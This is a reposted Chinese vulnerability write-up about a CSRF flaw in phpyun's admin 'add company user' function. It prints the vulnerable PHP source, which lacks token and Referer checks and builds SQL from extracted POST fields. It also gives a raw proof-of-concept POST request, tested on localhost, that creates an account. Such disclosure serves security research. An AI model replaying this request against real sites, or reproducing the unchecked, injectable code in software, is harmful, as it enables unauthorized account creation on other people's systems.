phpyun#csrf添加企业用户 没穿底裤 714文章 0评论 2020年1月1日03:38:58评论357 views字数 3240阅读10分48秒阅读模式

摘要（作者 Xser）：漏洞出现在 /admin/model/admin_company.class.php 中，没有验证 token 和 Referer，所以导致 CSRF；本地测试下，提交请求包。

漏洞作者: Xser

详细说明: 出现在 /admin/model/admin_company.class.php 中

function add_action(){
    $rating_list = $this->obj->DB_select_all("company_rating","`category`=1");
    if($_POST['submit']) {
        extract($_POST);
        if($username==""||strlen($username)<2||strlen($username)>15) {
            $msg = "会员名不能为空或不符合要求!";
        }elseif($password==""||strlen($username)<2||strlen($username)>15){
            $msg = "密码不能为空或不符合要求!";
        }elseif($email==""){
            $msg = "email不能为空!";
        }else{
            if($this->config['sy_uc_type']=="uc_center"){
                $this->obj->uc_open();
                $user = uc_get_user($username);
            }else{
                $user = $this->obj->DB_select_once("member","`username`='$username' OR `email`='$email'");
            }
            if(is_array($user)) {
                $msg = "用户名或邮箱已存在!";
            }else{
                $ip = $this->obj->fun_ip_get();
                $time = time();
                if($this->config['sy_uc_type']=="uc_center") {
                    $uid=uc_user_register($_POST['username'],$_POST['password'],$_POST['email']);
                    if($uid<0) {
                        $this->obj->get_admin_msg("index.php?m=com_member&c=add","该邮箱已存在!");
                    }else{
                        list($uid,$username,$email,$password,$salt)=uc_get_user($username);
                        $value = "`username`='$username',`password`='$password',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'";
                    }
                }else{
                    $salt = substr(uniqid(rand()), -6);
                    $pass = md5(md5($password).$salt);
                    $value = "`username`='$username',`password`='$pass',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'";
                }
                $nid = $this->obj->DB_insert_once("member",$value);
                $new_info = $this->obj->DB_select_once("member","`username`='$username'");
                $uid = $new_info['uid'];
                if($uid>0) {
                    $this->obj->DB_insert_once("company","`uid`='$uid',`name`='$name',`linktel`='$moblie',`linkmail`='$email',`address`='$address'");
                    $rat_arr = @explode("+",$rating_name);
                    $value = 
"`uid`='$uid',"; $value.=$this->rating_info($rat_arr[0]); $this->obj->DB_insert_once("company_statis",$value); $this->obj->DB_insert_once("friend_info","`uid`='$uid',`nickname`='$name',`usertype`='2'"); $msg="会员(ID:".$uid.")添加成功"; } } } if($_POST['type']){ echo "<script type='text/javascript'>window.location.href='index.php?m=admin_company_job&c=show&uid=".$nid."'</script>";die; }else{ $this->obj->ACT_layer_msg($msg,9,"index.php?m=admin_company",2,1); } 没有验证token还有refer 所以导致csrf,本地测试下 提交请求包 POST /phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add HTTP/1.1 Host: 127.0.0.1 Proxy-Connection: keep-alive Content-Length: 211 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1/phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: Hm_lvt_2a935166b0c9b73fef3c8bae58b95fe4=1411140464; bdshare_firstime=1411271506008; PHPSESSID=a65b349c297eaf372de3b329d7220db4; friend=0; friend_message=0; sysmsg=0; ashell=c0e024d9200b5705bc4804722636378a; remind_num=0 rating_name=3%2B%C3%E2%B7%D1%BB%E1%D4%B1&username=xssss&password=123456&email=10088055%40qq.com&moblie=132863&name=xss&address=xss&status=1&submit=%26%23160%3B%CC%ED+%BC%D3%26%23160%3B&pytoken=ebf2387fb39c&type= 构造表单就可以csrf了 如图 成功添加 修改用户资料那里也存在,就不一一提交了,在这里也随便提示了 免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。 点赞 https://cn-sec.com/archives/76225.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫